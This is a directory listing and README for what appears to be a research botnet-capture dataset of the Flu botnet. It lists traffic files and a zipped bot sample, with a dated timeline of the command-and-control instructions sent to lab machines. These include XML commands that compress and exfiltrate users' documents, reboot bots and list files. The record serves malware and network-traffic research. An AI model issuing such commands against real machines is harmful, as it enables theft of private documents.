Index of /publicDatasets/CTU-Malware-Capture-Botnet-138-1

[ICO]NameLast modifiedSizeDescription

[PARENTDIR]Parent Directory  -  
[   ]2013-06-08_capture1.biargus2015-10-05 17:32 195M 
[   ]2013-06-08_capture1.binetflow2015-10-05 17:32 207M 
[   ]2013-06-08_capture1.capinfos2015-10-05 17:26 723  
[   ]2013-06-08_capture1.dnstop2015-10-05 17:21 18K 
[   ]2013-06-08_capture1.passivedns2015-10-05 17:21 19K 
[   ]2013-06-08_capture1.pcap2015-10-05 20:46 1.4G 
[   ]2013-06-08_capture1.tcpdstat2016-12-05 22:28 2.2K 
[   ]2013-06-08_capture1.uniargus2016-12-05 22:28 186M 
[   ]2013-06-08_capture1.uninetflow2016-12-05 22:29 67M 
[   ]2013-06-08_capture1.weblogng2016-06-15 18:48 148M 
[TXT]README.html2017-01-14 17:09 6.5K 
[TXT]README.md2015-10-06 11:25 4.6K 
[DIR]bro/2017-08-31 09:45 -  
[TXT]fast-flux-dga-first-analysis.txt2017-01-14 17:09 48K 
[   ]flufollower-bot.exe.zip2015-12-16 10:26 21K 
[TXT]timeline.of.commands.txt2015-10-05 20:22 9.5K 

Description

About the configuration of Flu

Topology

Management traffic

We did several SSH connections to openshift for management purposes. They are not part of the infection.

Timeline (Unfortunately the timeline here is not comprehensive. For a comprehensive list of commands and times see the file timeline.of.commands.txt)

Mon, 08 Jul 2013 23:00:00 GMT

Start of the capture - During the first day, we only did the infection and the C&C connections.

Tue, 9 July 2013, 18:32:51

Changed the proxy to squid/3.3.7, because the other one was not allowing us to exfiltrate

Wed, 10 Jul 2013 01:26:05 GMT

Command 30958 sent.

Wed, 10 Jul 2013 12:28:23 GMT

Some copy of documents to a local folder

<instruction type="cp" argumento="C:\Users\Administrator\Documents\*.ppt C:\test\" id_unico_comando="24205" maquina="administrator_0800272508E5"/>

Wed, 10 Jul 2013 15:14:17 GMT

Compression of documents

<instruction type="Rar.exe" argumento="a C:\A1234567890.rar C:\Users\Administrator\Documents\*.pdf" id_unico_comando="8544" maquina="administrator_0800273C8DC9"/>

Wed, 10 Jul 2013 16:35:20 GMT

Exfiltration of documents

<instruction type="getfile" argumento="C:\A1234567890.rar" id_unico_comando="30596" maquina="administrator_0800272508E5"/>

Wed, 10 Jul 2013 23:26:41 GMT

More exfiltration of documents

<instruction type="getfile" argumento="C:\A001.rar" id_unico_comando="9501" maquina="administrator_0800272508E5"/>

Fri, 12 Jul 2013 22:27:22 GMT

Command 27269 sent.

<instruction type="snapshot" argumento="" id_unico_comando="27269" maquina="all"/>

Wed, 10 Jul 2013 23:31:11 GMT

Command to compress documents

<instruction type="Rar.exe" argumento="a C:\A123.rar C:\Users\Administrator\Documents\*.docx" id_unico_comando="277" maquina="administrator_0800273C8DC9"/>

Wed, 10 Jul 2013 23:41:01 GMT

Exfiltraion of documents

<instruction type="getfile" argumento="C:\A123.rar" id_unico_comando="2054" maquina="administrator_0800273C8DC9"/>

Thu, 11 Jul 2013 10:42:08 GMT

Command to shutdown one bot

<instruction type="shutdown" argumento="-r " id_unico_comando="20258" maquina="administrator_08002785477E"/>

Thu, 11 Jul 2013 13:03:41 GMT

Command to shutdown other bot

<instruction type="shutdown" argumento="-r" id_unico_comando="14756" maquina="administrator_0800273C8DC9"/>

Thu, 11 Jul 2013 13:07:55 GMT

Command to list files in all bots

<instruction type="listfiles" argumento="" id_unico_comando="25144" maquina="all"/>

Sun, 14 Jul 2013 13:28:43 GMT

Capture finished